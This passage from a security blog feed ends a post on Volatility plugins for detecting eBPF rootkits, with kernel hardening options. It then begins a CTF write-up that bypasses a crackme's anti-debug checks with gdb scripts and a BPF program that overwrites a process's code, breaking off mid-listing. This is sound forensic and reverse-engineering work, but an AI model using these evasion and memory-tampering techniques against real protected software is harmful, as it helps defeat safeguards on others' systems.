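        state = TRANSITIONS.get((state, op))
        if state is None:  # no transition: program not in the policy language
            return False
    return state == ACCEPT

assert allowed(["alu", "alu", "exit"])
assert not allowed(["alu", "call", "exit"])  # helper calls not in the policy
```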

<p>All these approaches are complementary to our plugins as they focus on reducing the chance that an attacker can successfully load a malicious program, while we assume that this step has already happened and aim to detect their presence.</p>

<h2 id="conclusion">Conclusion</h2>

<p>In this post, we gave an introduction to the Linux BPF subsystem and discussed its potential for abuse. We then presented seven Volatility plugins that allow investigators to detect BPF malware in memory images and evaluated them on multiple versions of popular Linux distributions. To conclude the post, we will briefly discuss related projects we are working on and plans for future work.</p>

<p>This project grew out of the preparation of a <a href="https://web.archive.org/web/20230323233100/https://dfrws.org/forensic-analysis-of-ebpf-based-linux-rootkits/">workshop</a> on BPF rootkits at the DFRWS EU 2023 annual conference (<a href="https://github.com/vobst/bpf-rootkit-workshop">materials</a>). We began working on this topic because we believe that the forensic community needs to expand its toolbox in response to the rise of BPF in the Linux world to fill blind spots in existing analysis methods. Additionally, investigators who may encounter BPF in their work should be made aware of the potential relevance of the subsystem to their investigation.</p>

<p>While the workshop, our plugins, and this post are an important step towards this goal, much work remains to be done. First, for the present work to be useful in the real world, our next goal must be to upstream most of it into the Volatility 3 project. Only this will ensure that investigators all around the world will be able to easily find and use it. This will require:</p>

<ul>
  <li>Refactoring of our utility code to use Volatility 3’s extension class mechanism</li>
  <li>Making the <code class="language-plaintext highlighter-rouge">bpf_graph</code> plugin’s dependency on <a href="https://networkx.org/documentation/stable/reference/algorithms/index.html">networkx</a> optional, as it is not yet a dependency of Volatility 3. If introducing a new dependency into the upstream project is not feasible, the plugin could check for the presence of the package at runtime.</li>
  <li>Additional testing on older kernel versions and kernels with diverse configurations to meet Volatility’s high standards regarding compatibility</li>
</ul>
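<p>The optional-dependency check mentioned above could look like the following sketch (plugin logic elided, names hypothetical):</p>

```python
# Degrade gracefully when networkx is absent instead of making it a hard
# dependency of the whole framework.
try:
    import networkx  # optional, only needed by the graph plugin
    HAVE_NETWORKX = True
except ImportError:
    HAVE_NETWORKX = False

def run_bpf_graph():
    if not HAVE_NETWORKX:
        raise RuntimeError("bpf_graph requires the optional networkx package")
    return networkx.DiGraph()  # plugin would populate and render this graph
```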

<p>We will be happy to work with upstream developers to make the integration happen.</p>

<p>Furthermore, there remains the problem of dealing with the wide variety of map types when extracting their contents, as well as the related problem of pretty-printing them using BTF information. Here, we consider a manual implementation impractical and would instead explore emulating the relevant kernel functions.</p>

<p>Regarding the advanced analysis aimed at countering anti-forensics, we have also implemented consistency checks against the lists of kprobes and tracepoints, but these require further work to be ready for publication. We also described additional analyses in our workshop that still need to be implemented.</p>

<p>Finally, an interesting side effect of the introduction of BPF into the Linux kernel is that most of the functionality requires BTF information for the kernel and modules to be available. This provides an easy solution to the problem of obtaining type information from a raw memory image, a step that is central to automatic profile generation. We have already shown that it is possible to reliably extract BTF sections from memory images by implementing a <a href="https://github.com/vobst/BPFVol3/blob/extractbtf/src/plugins/btf_extract.py">plugin</a> for that. We have also explored the possibility of combining this with existing approaches for extracting symbol information in order to obtain working profiles from a dump. While the results are promising, further work is needed to have a usable solution.</p>

<h2 id="appendix">Appendix</h2>

<h3 id="a-kernel-configuration">A: Kernel Configuration</h3>

<p>This section provides a list of compile-time kernel configuration options that can be adjusted to restrict the capabilities of BPF programs. In general, it is recommended to disable unused features in order to reduce the attack surface of a system.</p>

<ul>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/kernel/bpf/Kconfig#L26"><code class="language-plaintext highlighter-rouge">BPF_SYSCALL=n</code></a>: Disables the BPF system call. Probably breaks most systemd-based systems.</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/lib/Kconfig.debug#L345"><code class="language-plaintext highlighter-rouge">DEBUG_INFO_BTF=n</code></a>: Disables generation of BTF debug information, i.e., CO-RE (compile once, run everywhere) no longer works on this system. Forces attackers to compile on/for the system they want to compromise.</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/kernel/bpf/Kconfig#L90"><code class="language-plaintext highlighter-rouge">BPF_LSM=n</code></a>: BPF programs cannot be attached to LSM hooks.</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.67/source/security/lockdown/Kconfig#L33"><code class="language-plaintext highlighter-rouge">LOCK_DOWN_KERNEL_FORCE_INTEGRITY=y</code></a>: Prohibits the use of <code class="language-plaintext highlighter-rouge">bpf_probe_write_user</code>.</li>
  <li><a href="https://www.kernelconfig.io/CONFIG_NET_CLS_BPF?q=NET_CLS_BPF&amp;kernelversion=6.6.6&amp;arch=x86"><code class="language-plaintext highlighter-rouge">NET_CLS_BPF=n</code></a> and <a href="https://www.kernelconfig.io/CONFIG_NET_ACT_BPF?q=CONFIG_NET_ACT_BPF&amp;kernelversion=6.6.6&amp;arch=x86"><code class="language-plaintext highlighter-rouge">NET_ACT_BPF=n</code></a>: BPF programs cannot be used as TC classifiers and actions. Stops some data exfiltration techniques.</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.67/source/lib/Kconfig.debug#L1880"><code class="language-plaintext highlighter-rouge">FUNCTION_ERROR_INJECTION=n</code></a>: Disables the function error injection framework, i.e., BPF programs can no longer use <code class="language-plaintext highlighter-rouge">bpf_override_return</code>.</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/net/netfilter/Kconfig#L1168"><code class="language-plaintext highlighter-rouge">NETFILTER_XT_MATCH_BPF=n</code></a>: Disables the option to use <a href="https://blog.cloudflare.com/programmable-packet-filtering-with-magic-firewall/">BPF programs in nftables rules</a>, which could be used to implement malicious firewall rules.</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/kernel/trace/Kconfig#L696"><code class="language-plaintext highlighter-rouge">BPF_EVENTS=n</code></a>: Removes the option to attach BPF programs to kprobes, uprobes, and tracepoints.</li>
</ul>

<p>Below are options that limit features that we consider less likely to be used by malware.</p>

<ul>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/net/bpfilter/Kconfig#L2"><code class="language-plaintext highlighter-rouge">BPFILTER=n</code></a>: This is an unfinished BPF-based replacement of iptables/nftables (currently not functional).</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/net/Kconfig#L397"><code class="language-plaintext highlighter-rouge">LWTUNNEL_BPF=n</code></a>: Disables the use of BPF programs for routing decisions in light weight tunnels.</li>
  <li><a href="https://elixir.bootlin.com/linux/v6.1.68/source/init/Kconfig#L1157"><code class="language-plaintext highlighter-rouge">CGROUP_BPF=n</code></a>: Disables the option to attach BPF programs to cgroups. Cgroup programs can monitor various networking-related events of processes in the group. Probably breaks most systemd-based systems.</li>
</ul>]]></content><author><name></name></author><summary type="html"><![CDATA[Have you ever wondered how an eBPF rootkit looks like? Well, here’s one, have a good look:]]></summary></entry><entry><title type="html">Solving Binary Gecko’s Hexacon CTF with frida and angr [stage 1, Linux]</title><link href="https://blog.eb9f.de/2023/10/20/ctf_hxn23_binary_gecko_stage_1_linux.html" rel="alternate" type="text/html" title="Solving Binary Gecko’s Hexacon CTF with frida and angr [stage 1, Linux]" /><published>2023-10-20T00:00:00+00:00</published><updated>2023-10-20T00:00:00+00:00</updated><id>https://blog.eb9f.de/2023/10/20/ctf_hxn23_binary_gecko_stage_1_linux</id><content type="html" xml:base="https://blog.eb9f.de/2023/10/20/ctf_hxn23_binary_gecko_stage_1_linux.html"><![CDATA[<p>This year’s <a href="https://www.hexacon.fr/">Hexacon</a> featured several CTFs hosted by some of the sponsoring companies. This post is a brief writeup of my solution for the stage-one Linux challenge by <a href="https://binarygecko.com/">Binary Gecko</a>, a “[…] provider of comprehensive and specialized cybersecurity solutions to businesses and institutions of all sizes.”, aha.</p>

<p>tl;dr: Work around a bunch of anti-debug techniques to dump a second-stage payload. Use <a href="https://angr.io/">angr</a> (after convincing it to load the malformed dump) to solve a standard crackme that yields the flag. Then validate that it is correct, using <a href="https://frida.re/">frida</a> to work around some more anti-debug annoyances.</p>

<h2 id="overview">Overview</h2>
<p>We are given a static binary without any symbols or useful strings, but with an rwx segment, great. Running it just tells us to ‘Get out!’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>% readelf --segments hexalinux.bin

Elf file type is EXEC (Executable file)
Entry point 0x2000c0
There are 2 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000200000 0x0000000000200000
                 0x0000000000003a87 0x0000000000003a87  RWE    0x200000
  LOAD           0x0000000000003a87 0x0000000000a03a87 0x0000000000a03a87
                 0x0000000000004010 0x0000000000004010  RW     0x200000
% file hexalinux.bin
hexalinux.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
% ./hexalinux.bin
Get out!!
</code></pre></div></div>
<p>Furthermore, throwing it into a disassembler shows many unprocessed regions, indicating some sort of packing.</p>

<h2 id="anti-debug-vol-1">Anti-Debug Vol. 1</h2>
<p>Using <code class="language-plaintext highlighter-rouge">strace</code> shows us the first anti-debug technique: the binary checks <code class="language-plaintext highlighter-rouge">/proc/self/status</code>. Usually this is a check of the “TracerPid” value to detect the presence of a debugger.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>% strace ./hexalinux.bin
execve("./hexalinux.bin", ["./hexalinux.bin"], 0x70bb0b5efd70 /* 43 vars */) = 0
getpid()                                = 34999
stat("/proc/34999/status", {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
open("/proc/34999/status", O_RDONLY)    = 3
read(3, "Name:\thexalinux.bin\nUmask:\t0022\n"..., 4095) = 1207
close(3)                                = 0
exit(0)                                 = ?
</code></pre></div></div>
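<p>The underlying check is easy to re-implement; here is a minimal Python sketch (the function name is hypothetical) of what the binary presumably does with the file contents:</p>

```python
# Parse the TracerPid field from /proc/PID/status; a nonzero value means
# another process is ptrace-attached, i.e., we are being debugged.
import os

def tracer_pid(status_text):
    for line in status_text.splitlines():
        if line.startswith("TracerPid:"):
            return int(line.split(":", 1)[1])
    return 0

if os.path.exists("/proc/self/status"):  # Linux only
    with open("/proc/self/status") as f:
        if tracer_pid(f.read()) != 0:
            print("Get out!!")
```

This also suggests the bypass: once the file contents are in memory, overwriting the digits after <code class="language-plaintext highlighter-rouge">TracerPid:</code> with a zero defeats the check.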
<p>At this point, I went searching for a <a href="https://github.com/vobst/ctf_hxn23_binary_gecko_stage_1_linux/blob/master/gdb_script.py">gdb script</a> I use in those situations. Using <a href="https://binary.ninja/">my favorite decompiler</a>, I made a list of all the <code class="language-plaintext highlighter-rouge">syscall</code> addresses in the binary.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="n">x</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="p">[[</span><span class="n">i</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">f</span><span class="p">.</span><span class="n">instructions</span> <span class="k">if</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">])</span> <span class="o">==</span> <span class="s">'syscall'</span><span class="p">]</span> <span class="k">for</span> <span class="n">f</span> <span class="ow">in</span> <span class="n">bv</span><span class="p">.</span><span class="n">functions</span><span class="p">]</span> <span class="k">if</span> <span class="n">x</span><span class="p">]</span>
</code></pre></div></div>
<p>The script simply uses them to place a breakpoint before and after each syscall instruction. Combining this with a <a href="https://github.com/martinclauss/syscall_number">tool to convert syscall numbers to names</a>, we got ourselves a poor man’s <code class="language-plaintext highlighter-rouge">strace</code>! We can also automate the bypassing of the first anti-debug check by simply overwriting the string that was read from the status file.</p>

<h2 id="anti-debug-vol-2">Anti-Debug Vol. 2</h2>
<p>Running the binary under our ad hoc <code class="language-plaintext highlighter-rouge">strace</code> shows a call to <code class="language-plaintext highlighter-rouge">fork</code> and then many <code class="language-plaintext highlighter-rouge">ptrace</code> invocations - it seems that the first process is spawning another process and then does some fun stuff to it. However, we soon exit due to some other anti-debug check.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SYS_getpid(arg1=0x0,arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x13f2
SYS_stat(arg1=0x7fffffffd340,arg2=0x7fffffffd3c0,arg3=0x7fffffffd32f,arg4=0x7fffffffd3c0,arg5=0x0) -&gt; 0x0
SYS_open(name=0x7fffffffd340:   "/proc/5106/status",arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x3
SYS_read(fd=0x3,buf=0x7fffffffd450,n=0xfff,arg4=0xfff,arg5=0x3) -&gt; 0x4b1
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffffd450,arg3=0xfff,arg4=0xfff,arg5=0x0) -&gt; 0x0
[Detaching after fork from child process 5109]
SYS_fork(arg1=0x7fffffffd450,arg2=0x7fffffffd315,arg3=0x7fffffffd45b,arg4=0xfff,arg5=0x0) -&gt; 0x13f5
SYS_rt_sigaction(arg1=0x5,arg2=0x7fffffff6970,arg3=0x0,arg4=0x8,arg5=0x0) -&gt; 0x0
SYS_mmap(arg1=0x0,arg2=0x100000,arg3=0x3,arg4=0x22,arg5=0xffffffff) -&gt; 0x7ffff7ef9000
SYS_getpid(arg1=0x0,arg2=0x100000,arg3=0x3,arg4=0x22,arg5=0x0) -&gt; 0x13f2
SYS_stat(arg1=0x7fffffff6a60,arg2=0x7fffffff6d60,arg3=0x7fffffff6a1f,arg4=0x7fffffff6d60,arg5=0x0) -&gt; 0x0
SYS_open(name=0x7fffffff6a60:   "/proc/5106/status",arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x3
SYS_read(fd=0x3,buf=0x7fffffff72d0,n=0xfff,arg4=0xfff,arg5=0x3) -&gt; 0x4b1
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffff72d0,arg3=0xfff,arg4=0xfff,arg5=0x0) -&gt; 0x0
SYS_prctl(arg1=0x4,arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x0
SYS_ptrace(arg1=0x4200,arg2=0x13f5,arg3=0x0,arg4=0x10005e,arg5=0x0) -&gt; 0x0
SYS_ptrace(arg1=0x7,arg2=0x13f5,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x0
SYS_wait4(arg1=0x13f5,arg2=0x7fffffff69ac,arg3=0x40000001,arg4=0x0,arg5=0x0) -&gt; 0x13f5
SYS_getpid(arg1=0x13f5,arg2=0x7ffff7ef9020,arg3=0x7f,arg4=0x0,arg5=0x0) -&gt; 0x13f2
SYS_stat(arg1=0x7fffffff6ae0,arg2=0x7fffffff6df0,arg3=0x7fffffff6a2f,arg4=0x7fffffff6df0,arg5=0x0) -&gt; 0x0
SYS_open(name=0x7fffffff6ae0:   "/proc/5106/status",arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x3
SYS_read(fd=0x3,buf=0x7fffffff82d0,n=0xfff,arg4=0xfff,arg5=0x3) -&gt; 0x4b1
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffff82d0,arg3=0xfff,arg4=0xfff,arg5=0x0) -&gt; 0x0

Program received signal SIGTRAP, Trace/breakpoint trap.
0x0000000000201496 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
[!] Command 'registers' failed to execute properly, reason: [Errno 13] Permission denied: '/proc/35415/maps'
─────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
[!] Command 'dereference' failed to execute properly, reason: [Errno 13] Permission denied: '/proc/35415/maps'
───────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x201489                  jne    0x201002
     0x20148f                  mov    eax, DWORD PTR [rip+0x24db]        # 0x203970
     0x201495                  int3
 →   0x201496                  add    eax, 0x1
     0x201499                  cmp    eax, DWORD PTR [rip+0x24d1]        # 0x203970
     0x20149f                  jne    0x201002
     0x2014a5                  xor    eax, eax
     0x2014a7                  call   0x2026a0
     0x2014ac                  mov    r8d, eax
───────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "hexalinux_patch", stopped 0x201496 in ?? (), reason: SIGTRAP
─────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x201496 → add eax, 0x1
</code></pre></div></div>
<p>There are two interesting things here: we cannot access the <code class="language-plaintext highlighter-rouge">/proc/self/maps</code> of the debuggee, and there is a breakpoint instruction that we did not put there.</p>

<p>The reason behind the first issue is the call to <code class="language-plaintext highlighter-rouge">SYS_prctl</code> that we can see in the trace above. It is made with the <code class="language-plaintext highlighter-rouge">PR_SET_DUMPABLE</code> parameter. Apart from the obvious effect of disabling core dumps, this affects the ownership rules of the process’ proc files, which is why our debugger cannot access them anymore. I simply used the gdb script to turn the call to prctl into a call to <code class="language-plaintext highlighter-rouge">SYS_close(-1)</code>, i.e., a no-op, and afterwards adjusted the return value to indicate success.</p>
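<p>For reference, the effect is easy to reproduce from Python via <code class="language-plaintext highlighter-rouge">ctypes</code> (Linux only; the constants below are the values documented in the prctl man page):</p>

```python
# After prctl(PR_SET_DUMPABLE, 0), the process's /proc files are owned by
# root, so an unprivileged debugger loses access to maps, mem, etc.
import ctypes
import os

PR_GET_DUMPABLE = 3
PR_SET_DUMPABLE = 4

if os.path.exists("/proc/self/status"):  # crude Linux check
    libc = ctypes.CDLL(None, use_errno=True)
    libc.prctl(PR_SET_DUMPABLE, 0, 0, 0, 0)
    assert libc.prctl(PR_GET_DUMPABLE, 0, 0, 0, 0) == 0
```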

<p>The second observation is more interesting. As we can see in the above trace, the process calls <code class="language-plaintext highlighter-rouge">SYS_rt_sigaction</code> to set the signal handler for the <code class="language-plaintext highlighter-rouge">SIGTRAP</code> signal to a function at <code class="language-plaintext highlighter-rouge">0x202070</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00202070  int64_t sigtrap_handler()

00202070  f30f1efa           endbr64
00202074  8305f518000001     add     dword [rel data_203970], 0x1
0020207b  c3                 retn     {__return_addr}

00202080  uint64_t adbg_set_sigtrap_handler()

00202080  f30f1efa           endbr64
00202084  4883ec28           sub     rsp, 0x28
00202088  31d2               xor     edx, edx  {0x0}
0020208a  bf05000000         mov     edi, 0x5
0020208f  4889e6             mov     rsi, rsp {var_28}
00202092  48c7442418ffffff…  mov     qword [rsp+0x18 {var_10}], 0xffffffffffffffff
0020209b  48c7042470202000   mov     qword [rsp {var_28}], sigtrap_handler
002020a3  48c7442408000000…  mov     qword [rsp+0x8 {var_20}], 0x4000000
002020ac  48c7442410602020…  mov     qword [rsp+0x10 {var_18}], data_202060
002020b5  e806060000         call    sigaction
002020ba  85c0               test    eax, eax
002020bc  7805               js      0x2020c3

002020be  4883c428           add     rsp, 0x28
002020c2  c3                 retn     {__return_addr}

002020c3  31ff               xor     edi, edi  {0x0}
002020c5  e816040000         call    exit

</code></pre></div></div>
<p>Your disassembler probably did not catch the upper function on the first pass, but it simply increments the memory at <code class="language-plaintext highlighter-rouge">0x203970</code> by one. The code around the breakpoint then validates that the handler runs when executing the <code class="language-plaintext highlighter-rouge">int3</code> instruction, cool. Of course, the handler will not run while we are debugging, which is another thing we can fix with the script.</p>
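<p>The logic of this check can be sketched in a few lines of Python (Linux only, and a loose analogy rather than a faithful port): install a handler that bumps a counter, trigger the trap, and verify the counter changed. A debugger that intercepts <code class="language-plaintext highlighter-rouge">SIGTRAP</code> keeps the handler from running, failing the check.</p>

```python
import signal

counter = 0

def on_sigtrap(signum, frame):
    global counter
    counter += 1  # analogous to the increment of data_203970 above

if hasattr(signal, "SIGTRAP"):  # not available on all platforms
    signal.signal(signal.SIGTRAP, on_sigtrap)
    before = counter
    signal.raise_signal(signal.SIGTRAP)  # stand-in for the int3 instruction
    assert counter == before + 1  # under a debugger, the signal is swallowed
```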

<h2 id="anti-debug-vol-3">Anti-Debug Vol. 3</h2>

<p>Even with all these countermeasures in place, I still crashed due to an invalid memory reference. It happened at a seemingly arbitrary point while debugging the child process (before the parent attaches to it):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SYS_getpid(arg1=0x0,arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x147a
SYS_stat(arg1=0x7fffffffd350,arg2=0x7fffffffd3d0,arg3=0x7fffffffd33f,arg4=0x7fffffffd3d0,arg5=0x0) -&gt; 0x0
SYS_open(name=0x7fffffffd350:   "/proc/5242/status"
,arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x3
SYS_read(fd=0x3,buf=0x7fffffffd460,n=0xfff,arg4=0xfff,arg5=0x3) -&gt; 0x4b0
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffffd460,arg3=0xfff,arg4=0xfff,arg5=0x0) -&gt; 0x0
[Attaching after process 5242 fork to child process 5245]
[New inferior 2 (process 5245)]
[Detaching after fork from parent process 5242]
[Inferior 1 (process 5242) detached]
SYS_fork(arg1=0x7fffffffd460,arg2=0x7fffffffd325,arg3=0x7fffffffd46b,arg4=0xfff,arg5=0x0) -&gt; 0x0
SYS_setrlimit(arg1=0x4,arg2=0x7fffffffd340,arg3=0x7fffffffd46b,arg4=0x7fffffffd340,arg5=0x0) -&gt; 0x0
SYS_getpid(arg1=0x7fffffffe480,arg2=0x7fffffffd340,arg3=0x7fffffffd46b,arg4=0x7fffffffd340,arg5=0x0) -&gt; 0x147d
SYS_stat(arg1=0x7fffffffd330,arg2=0x7fffffffd3b0,arg3=0x7fffffffd29f,arg4=0x7fffffffd3b0,arg5=0x0) -&gt; 0x0
SYS_open(name=0x7fffffffd330:   "/proc/5245/status",arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -&gt; 0x3
SYS_read(fd=0x3,buf=0x7fffffffd440,n=0xfff,arg4=0xfff,arg5=0x3) -&gt; 0x4b1
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffffd440,arg3=0xfff,arg4=0xfff,arg5=0x0) -&gt; 0x0
SYS_setrlimit(arg1=0x4,arg2=0x7fffffffd2a0,arg3=0x7,arg4=0x7fffffffd2a0,arg5=0x0) -&gt; 0x0

Thread 2.1 "hexalinux_patch" received signal SIGBUS, Bus error.
[...]
$rbp   : 0x89a770da45244a2e
[...]
 →   0x2003be                  mov    eax, DWORD PTR [rbp+0x0]
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">rbp</code> was always holding some garbage value. At this point I got kind of annoyed and started patching the code; however, this only increased my dissatisfaction, as it turned out that the binary detects code modifications and gets trapped in an endless loop, charming.</p>

<p>I did not investigate these two issues further, but one of the other two (yea, there are more) anti-debug measures performed by the child led me onto the right track.</p>

<h2 id="anti-debug-vol-4">Anti-Debug Vol. 4</h2>

<p>The first thing the child does is set the resource limit for the maximum core dump size to zero, i.e., <code class="language-plaintext highlighter-rouge">SYS_setrlimit(0x4...)</code>. That’s not a problem, as we can bypass it by turning it into a no-op <code class="language-plaintext highlighter-rouge">close(-1)</code> via the debugger. However, the second activity is more interesting: the child sanitizes its environment variables on the stack, removing some variables interpreted by the <a href="https://man7.org/linux/man-pages/man8/ld.so.8.html">dynamic linker</a> … interesting: why care about those variables in a static binary?</p>
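<p>The first action corresponds to a plain <code class="language-plaintext highlighter-rouge">setrlimit(RLIMIT_CORE, ...)</code> with a zero soft limit; on Linux, <code class="language-plaintext highlighter-rouge">RLIMIT_CORE</code> is resource number 4, matching the <code class="language-plaintext highlighter-rouge">0x4</code> in the trace. In Python:</p>

```python
# A zero core-size limit means the kernel never writes a core dump for
# this process, denying an analyst a cheap memory snapshot on crash.
import resource  # Unix only

soft, hard = resource.getrlimit(resource.RLIMIT_CORE)
resource.setrlimit(resource.RLIMIT_CORE, (0, hard))
assert resource.getrlimit(resource.RLIMIT_CORE)[0] == 0
```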

<p><em>Aside</em>: I guess there is a bug when sanitizing the stack:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00202100  char** adbg_sanitize_env(void* argcp)

00202100  f30f1efa           endbr64
00202104  53                 push    rbx {__saved_rbx}
00202105  488d4708           lea     rax, [rdi+0x8]
00202109  4883ec20           sub     rsp, 0x20
0020210d  0f1f00             nop     dword [rax], eax

00202110  4889c2             mov     rdx, rax
00202113  4883c008           add     rax, 0x8
00202117  48833800           cmp     qword [rax], 0x0
0020211b  75f3               jne     0x202110
...
</code></pre></div></div>
<p>Since <code class="language-plaintext highlighter-rouge">rdi</code> points to <code class="language-plaintext highlighter-rouge">argc</code>, the first loop, which is meant to skip the argument vector <code class="language-plaintext highlighter-rouge">argv</code>, actually skips the environment variables when the program is executed with no arguments at all (yes, <code class="language-plaintext highlighter-rouge">argv[0]</code> is optional).</p>
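<p>The slip can be seen in a toy model of the loop, with Python list indices standing in for 8-byte stack slots and <code class="language-plaintext highlighter-rouge">None</code> for NULL pointers:</p>

```python
def find_envp(stack):
    # mimics the loop above: rax = rdi + 8, then rax += 8 until the qword
    # at rax is NULL; the slot after that NULL is taken as the start of envp
    i = 2  # first comparison happens only after the increment
    while stack[i] is not None:
        i += 1
    return i + 1

# argc = 2: the NULL found is argv's terminator, envp is located correctly
assert find_envp([2, "prog", "arg", None, "A=1", None]) == 4
# argc = 0: argv's terminator at slot 1 is stepped over, so the scan runs
# through the environment and ends up one past its terminator instead
assert find_envp([0, None, "A=1", "B=2", None]) == 5
```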

<h2 id="change-of-strategy">Change of Strategy</h2>

<p>As it didn’t look like I could debug either parent or child with any meaningful results, and reversing the binary statically didn’t look fun either (especially due to the parent poking the child via ptrace, which makes it hard to reason about the child’s control flow, some obvious second-stage unpacking, and potentially self-modifying code), I decided to switch tracks.</p>

<p>Remember that the binary printed “Get out!” to stdout? The disassembly I was looking at did not even contain a write system call! At first, I suspected that the <code class="language-plaintext highlighter-rouge">write</code> syscall was made from shellcode, so I wrote a <a href="https://github.com/vobst/ctf_hxn23_binary_gecko_stage_1_linux/blob/master/hexalinux.bpf.c">small BPF program</a> that hooks the write syscall and overwrites the code after the syscall instruction with an endless loop, i.e., <code class="language-plaintext highlighter-rouge">jmp 0x0</code>. This would allow me to inspect whichever process made the syscall, or so I hoped.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">SEC</span><span class="p">(</span><span class="s">"tp/syscalls/sys_enter_write"</span><span class="p">)</span>
<span class="kt">int</span> <span class="nf">tp_sys_enter_write</span><span class="p">(</span><span class="k">struct</span> <span class="n">trace_event_raw_sys_exit</span><span class="o">*</span> <span class="n">tp</span><span class="p">)</span>
<span class="p">{</span>
  <span class="k">struct</span> <span class="n">task_struct</span><span class="o">*</span> <span class="n">task</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
  <span class="k">struct</span> <span class="n">pt_regs</span><span class="o">*</span> <span class="n">regs</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
  <span class="kt">int</span> <span class="n">argc</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
  <span class="kt">void</span> <span class="o">*</span><span class="n">ip</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

  <span class="c1">// only hook child and parent</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">bpf_get_current_comm</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">)))</span> <span class="p">{</span>
    <span class="n">bpf_printk</span><span class="p">(</span><span class="s">"error: bpf_get_current_comm</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">__builtin_memcmp</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="s">"hexalinux"</span><span class="p">,</span> <span class="mi">9</span><span class="p">))</span> <span class="p">{</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="c1">// get address of insn after `syscall`</span>
  <span class="n">task</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">task_struct</span><span class="o">*</span><span class="p">)</span><span class="n">bpf_get_current_task_btf</span><span class="p">();</span>
  <span class="n">regs</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">pt_regs</span><span class="o">*</span><span class="p">)</span><span class="n">bpf_task_pt_regs</span><span class="p">(</span><span class="n">task</span><span class="p">);</span>
  <span class="n">ip</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">BPF_CORE_READ</span><span class="p">(</span><span class="n">regs</span><span class="p">,</span> <span class="n">ip</span><span class="p">);</span>

  <span class="n">bpf_printk</span><span class="p">(</span><span class="s">"IP: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">ip</span><span class="p">);</span>

  <span class="c1">// 0:  e9 fb ff ff ff          jmp    0x0</span>
